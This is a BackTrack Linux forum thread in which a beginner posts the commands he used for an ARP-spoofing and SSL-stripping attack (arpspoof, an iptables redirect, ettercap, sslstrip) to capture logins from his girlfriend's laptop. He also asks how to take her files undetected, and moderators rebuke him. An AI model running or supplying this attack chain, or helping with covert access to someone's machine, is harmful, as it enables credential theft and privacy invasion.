Results 1 to 6 of 6

Thread: Help restore my hdd install

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    2

    Default Help restore my hdd install

    I installed BT4 on my HD, multiboot, dell xps m1530, 4GB core2duo 2.4, intel pro 4965AGN wireless card, followed gotmilks tutorials on sslstrip/ettercap etc but can't seem to get it to work, I also use a usb rtl8187.

    I boot BT4 on my lap, connect to our network, then use my girlfriends laptop to "try" sign into my yahoo mail, paypay etc and my gf's lap just wont log into anything that requires sign-in, it browses no probs, just when i try sign into my mail etc the page cannot be displayed, I used the same way before and got the warnings etc, " not advised to proceed" or whatever its says but then ettercap threw out the log and pass, now i cant get that far, could my hdd version have changed and needs to be restored by some magic commands, please help or send me a link,

    I also made a live usb on a 2gb thumb earlier, can i change etter.conf on live usb?, please help a noob.

    My gf's wireless card is a dell standard issue.

    Also while I'm here , can some body point me in the general direction of how to get and place files on her lap through our network,.

    Before I was aware of bt I used to get the warnings signing in, i just clicked on, i trusted the source etc, I was on wep, "thought" i was secure, now on wpa with lots of odd characters.

    I'm just curious as to what the suspected "hacker" was actually able to see and get, I know I have to seek these things myself, but a little help is all I ask, such as the term i would use to view/edit/extract files from another computer on my network, is it called "tunnelling" etc, so please be gentle with the replies telling me to learn the basics etc, but its hard to "learn" with a 7 month old baby.

    Thanks All.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    23

    Default Re: Help restore my hdd install

    Quote Originally Posted by uprising View Post
    I installed BT4 on my HD, multiboot, dell xps m1530, 4GB core2duo 2.4, intel pro 4965AGN wireless card, followed gotmilks tutorials on sslstrip/ettercap etc but can't seem to get it to work, I also use a usb rtl8187.

    I boot BT4 on my lap, connect to our network, then use my girlfriends laptop to "try" sign into my yahoo mail, paypay etc and my gf's lap just wont log into anything that requires sign-in, it browses no probs, just when i try sign into my mail etc the page cannot be displayed, I used the same way before and got the warnings etc, " not advised to proceed" or whatever its says but then ettercap threw out the log and pass, now i cant get that far, could my hdd version have changed and needs to be restored by some magic commands, please help or send me a link,

    I also made a live usb on a 2gb thumb earlier, can i change etter.conf on live usb?, please help a noob.

    My gf's wireless card is a dell standard issue.

    Also while I'm here , can some body point me in the general direction of how to get and place files on her lap through our network,.

    Before I was aware of bt I used to get the warnings signing in, i just clicked on, i trusted the source etc, I was on wep, "thought" i was secure, now on wpa with lots of odd characters.

    I'm just curious as to what the suspected "hacker" was actually able to see and get, I know I have to seek these things myself, but a little help is all I ask, such as the term i would use to view/edit/extract files from another computer on my network, is it called "tunnelling" etc, so please be gentle with the replies telling me to learn the basics etc, but its hard to "learn" with a 7 month old baby.

    Thanks All.
    wow, I don't know whether i'm p!$$3d that I actually took the time to read all from above or the fact that i'm still lost on what's wrong! (sorry man, couldn't resist!)

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Help restore my hdd install

    Yeah I agree, this post is like the ramblings of a lunatic!

    OP Maybe you should do one of two things. 1 Learn the basics I made a thread just for you here: http://www.backtrack-linux.org/forum...-forum/423.htm
    2 Take care of your baby. Not saying you don't but with the stress it alone brings and your incoherent babbling above, we are not sure of your question/ problem.

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Help restore my hdd install

    Yea this post it has like no sense, please try to make your problem clear next time.
    First of all it's not made for this, second you have to install the latest Pidgin for it to work, the one from the repo's doesn't work anymore.
    Ettercap doesn't work because you didn't configure it, you can change the .conf file from an usb stick.
    And for your last question with the "hacker" you will have to explain better what happaned, what did he do etc.

  5. #5
    Just burned his ISO
    Join Date
    May 2010
    Posts
    2

    Default

    Ok, I'll try again without the rambling.

    I was using wep for a long time and the same warning screen has appeared numerous times when I was signing into email/paypal or any "secure" site, the warning not to proceed etc, I just clicked through them to get to my email etc, so I "suspect" there was a hacker somewhere close by catching/stealing these usernames and passwords, I've since changed to wpa.

    Now my original question in plain, Can i restore my original hdd install to its original state with some "restore" script, or more to the point do I actually need to.
    I was "learning" and following tutorials and was curious to sniff my own passwords using my lap as attacker and my GF's as victim, her laptop was browsing everything just perfect, but when I tried to sign into a secure site to enter my user/pass the browser wouldn't allow the page to load.

    I have removed the 2 # in etter.conf under linux/iptables, I'm just curious as to why her laptop won't allow secure pages to open, when I stop "sniffing" her laptop gets back to normal and opens all the secure pages on the web.


    Also I want to view pics from her laptop, I could simply pick it up and go to my pictures but thats not what I want, I want to learn how to use my lap to get her pics without being detected and transfer them to mine, just as any would be hacker could have done in the past, my GF the great joker has pics of me just exiting the shower naked etc and these were "private", now I realise NOTHING is private.
    Maybe I'm paronoid but I believe I have been the victim of a sniffer for a while now, and there are personal family pics stored on her laptop and I wanted to learn how I can view these through one of BT4's many wonderful tools, i dont want a step by step guide, just a simple "ckeck out xxxxxxxxx that should help"


    Thank you sickness for helping a little about pidgin, now I can google that and find out how to install it.
    I am learning, and replies on this forum tend to be blunt, chill out guys, send me your addresses and i'll post some valium to help with noob assholes like myself.

    Thanks again.

    Quote Originally Posted by uprising View Post
    I installed BT4 on my HD, multiboot, dell xps m1530, 4GB core2duo 2.4, intel pro 4965AGN wireless card, followed gotmilks tutorials on sslstrip/ettercap etc but can't seem to get it to work, I also use a usb rtl8187.
    This is my laptop and hardware, just added it so nobody can say "we need more info on your card/processor,whatever

    I boot BT4 on my lap, connect to our network, then use my girlfriends laptop to "try" sign into my yahoo mail, paypay etc and my gf's lap just wont log into anything that requires sign-in, it browses no probs, just when i try sign into my mail etc the page cannot be displayed.
    I boot BT4 on my lap

    SHELL
    kate /etc/etter.conf enter

    (remove # under linux iptables)
    ---------------------------------------------------------------------------

    ifconfig wlan0


    -----------------------------------------------------------------
    shell 1
    -----------------------------------------------------------------
    echo 1 > /proc/sys/net/ipv4/ip_forward

    clear

    arpspoof -i wlan0 -t 192.168.1.(?6) 192.168.1.1

    ------------------------------------------------------------------
    newshell 2
    --------------------------------------------------------------------

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    ettercap -T -q -i wlan0

    (Quit q or CYRL C)

    clear


    sslstrip -a -k -f

    --------------------------------------------------------------------------------------
    new shell 3
    ------------------------------------------------------------------------------------

    ettercap -T -q -i wlan0

    ------------------------------------------------------------------------------------------

    I used the same way before and got the warnings etc, " not advised to proceed" or whatever its says but then ettercap threw out the log and pass("Gave me the user and pass", now i cant get that far, could my hdd version have changed and needs to be restored by some magic commands, please help or send me a link, (because it worked before and not now, I wonder have I changed anything without realising and is now causing this?

    I also made a live usb on a 2gb thumb earlier, can i change etter.conf on live usb?, please help a noob. Just a useless piece of info, incase somebody says use a live usb stick, and when I change etter.conf from the usb boot will the deleted # be permanent on usb or only for that session in my ram, in other words must i remove # everytime i boot from live usb

    My gf's wireless card is a dell standard issue. More useless info, dont ask why.

    Also while I'm here , can some body point I should google for such a task?, I want to learn how to access another lap on my network, I could just pick it up and look at the pics etc, but thats not the point, I'd like to learn how this is done, point me in the general direction of how to get and place files on her lap through our network. How and What tool should I look into to use my BT4 to access her files on her system, and what is the term and I don't plan on posting 10 stupid questions a day with stuff that is already there somewhere.

    Before I was aware of bt I used to get the warnings signing in, i just clicked on, i trusted the source etc, I was on wep, "thought" i was secure, now on wpa with lots of odd characters.
    Just saying when i was logging in before i got these messages and i trusted the sites so didnt hesitate to click proceed, giving my user/pass to a 3rd party in the process

    I'm just curious as to what the suspected "hacker" was actually able to see and get, I know I have to seek these things myself, but a little help is all I ask, such as the term i would use to view/edit/extract files from another computer on my network, is it called "tunnelling" etc, so please be gentle with the replies telling me to learn the basics etc, but its hard to "learn" with a 7 month old baby.
    me in the general direction of how to get and place files on her lap through our network. How and What tool should I look into to use my BT4 to access her files on her system, and what is the term


    Thanks All.
    Sorry I'll try translate this irish rant into something readable, the BOLD is my edit!

    And I know you guys must be pi$$ed with stupid noobs, but try punch a pillow before you reply, I'm sure you all remember the first time you made love, were you nominated for lover of the year?, and I did break the rule of not learning the basics, and I apologise, but now I'm obsessed with what Backtrack 4 is capable of, its just frustrating watching gotmilk typing out commands with one hand and sipping a cocktail with the other, and me here trying to emulate him, with bad results and the added paronia that a neighbour may be laughing at my pic of me exiting the shower, the b@$tard probably says "hi" everyday to me, but I'd like to learn ssl stripping and how to get into my GF's laptop and view files on it through the network using BT4 and see if I can view her system files, my pics etc, her OS is windows 7 Ultimate sp1??????.


    I hope this isn't seen as another rant and is a little better explained.

    Thank You
    Last edited by Archangel-Amael; 05-15-2010 at 05:26 PM.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Help restore my hdd install

    You are starting to piss me off.
    First of all Do not double post. Second of all no one is going to tell you how to be a haxor. If you want to learn fine, go for it. However we are not going to hold your hand in or during the process. We asked you to be specific about a problem you were having and again you made two posts both of which are worthless.
    I would strongly suggest you read this thread that I wrote just for you. It will get you started. If in the future you have a serious question out side of "please tell me how to steal the naked pictures of me getting out of the shower from my girlfriend", make a post providing what you have done and the error(s) you received and what research/actions you have taken to correct the situation.

Similar Threads

  1. How to restore my backtrack desktop!!
    By The Moorish in forum Beginners Forum
    Replies: 3
    Last Post: 04-13-2010, 01:17 PM
  2. grub restore with live USB bt4
    By heeenk in forum OLD BackTrack 4 General Support
    Replies: 2
    Last Post: 01-09-2010, 10:08 AM
  3. Backup and restore BT3 hdd instalation
    By imported_amidamaru in forum OLD BT3final Support
    Replies: 6
    Last Post: 10-17-2008, 01:44 AM
  4. Replies: 0
    Last Post: 07-15-2008, 03:39 PM
  5. Replies: 0
    Last Post: 07-14-2008, 06:52 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •